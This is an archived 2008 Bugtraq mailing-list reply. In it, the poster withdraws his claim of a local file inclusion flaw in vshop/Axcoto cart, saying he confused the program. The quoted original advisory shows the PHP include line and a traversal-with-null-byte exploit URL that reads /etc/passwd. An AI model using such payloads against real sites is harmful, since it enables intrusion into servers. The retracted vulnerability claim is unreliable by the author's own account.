lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <615c86240810230233w270b0c3bm2bb3d3953dd93299@mail.gmail.com>
Date: Thu, 23 Oct 2008 11:33:24 +0200
From: "Jose Luis" <pepeluxx@...il.com>
To: bugtraq@...urityfocus.com, bugtraq-owner@...urityfocus.com
Subject: Re: vshop - Axcoto cart <= 0.1alpha / Local File Inclusion Vulnerability

I'm sorry ... this is not vulnerable. I confused the program



2008/10/22 Pepelux <pepelux@...e-sec.org>:
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> vshop - Axcoto cart <= 0.1alpha / Local File Inclusion Vulnerability
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
> $ Program: vshop - Axcoto cart
> $ Version: <= 0.1alpha
> $ File affected: ADMIN/header.php
> $ Download: http://sourceforge.net/projects/vshop/
>
>
> Found by Pepelux <pepelux[at]enye-sec.org>
> eNYe-Sec - www.enye-sec.org
>
>
> --Bug --
>
> 4.      if (!$language)$language="ch";
> 5.      include_once("../lib/lang.".$language.".php");
>
>
>
> -- Exploit --
>
> http://site.com/ADMIN/header.php?language=/../../../../../etc/passwd%00
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ